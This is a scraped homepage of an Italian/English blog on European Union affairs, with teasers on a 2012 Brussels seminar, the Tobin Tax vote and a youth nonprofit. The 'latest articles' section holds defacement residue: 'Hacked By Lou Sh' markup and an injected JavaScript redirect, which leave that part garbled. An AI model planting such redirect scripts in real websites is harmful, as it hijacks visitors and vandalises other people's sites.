Everything you have to know about the relationship between Italy and Europe. Get ready for the hottest week of the summer 2012. Speakers form the most important institutions and Universities in the world will be your guide during the days of our seminars, because this relationship isn't only a national issues, but something that regards all the members of the EU and their neighbours.

Italy and the European Union (Brussels, July 9th to 13th, 2012) The purpose of this week-long seminar is provide an in-depth, comprehensive analysis of how Italy relates to the European Union in order to provide participants with an in depth knowledge of the whos and hows of Italy’s action (...)

it

Era nell’aria, da mesi rimbalzava da Berlino a Parigi passando per Roma, ma ora la proposta potrebbe diventare realtà. Il 23 maggio, infatti, il Parlamento UE ha dato il primo via libera alla Tobin Tax, la tassa che prende il nome dal premio Nobel, James Tobin

Con 487 voti favorevoli, 152 contrari e 46 astenuti, Strasburgo ha detto si alla relazione in favore della proposta per l’introduzione della tassa. In sostanza si tratta di un’imposta proporzionale applicata alle transazioni finanziarie eseguite sui mercati. La tassa andrebbe da un valore minimo (...)

it

Da tempo impegnata a garantire un futuro ricco di opportunità ai giovani, Giovani nel Mondo nasce come associazione no profit mira a favorire l’internazionalizzazione organizzando eventi e manifestazioni di notevole rilievo. Di recente gestisce il nuovo sito carriereinternazionali.com dove ognuno può meglio conoscere il modo in cui si svolge la ricerca e la conseguente assunzione di nuovi candidati nei più noti organismi internazionali.

Cos’è Giovani nel Mondo Giovani nel Mondo Un’associazione no profit interessata esclusivamente a fornire maggiori opportunità per il futuro dei giovani di oggi. Giovani nel Mondo si propone sin dalla sua nascita come un’associazione priva di (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France